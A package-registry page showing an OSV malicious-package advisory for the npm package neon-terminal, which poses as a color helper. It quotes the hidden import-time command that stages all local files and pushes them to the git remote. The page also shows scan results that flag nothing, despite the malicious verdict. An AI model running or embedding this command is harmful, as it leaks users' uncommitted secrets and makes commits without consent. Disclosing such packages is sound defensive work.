registry  /  neon-terminal  /  0.7.0

neon-terminal@0.7.0

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6793 confirms this npm version as malicious. neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on `require('neon-terminal')` or `import 'neon-terminal'`. The command runs `pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main` in the consumer's current working directory...

Advisory
MAL-2026-6793
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in neon-terminal (npm)
Details
neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on `require('neon-terminal')` or `import 'neon-terminal'`. The command runs `pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main` in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever `origin` remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.
Decision reason
No blocking static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessEnvironmentVarsShell
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 4.32 KB of source

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 Medium1 Low
MediumEnvironment Vars
LowScripts Present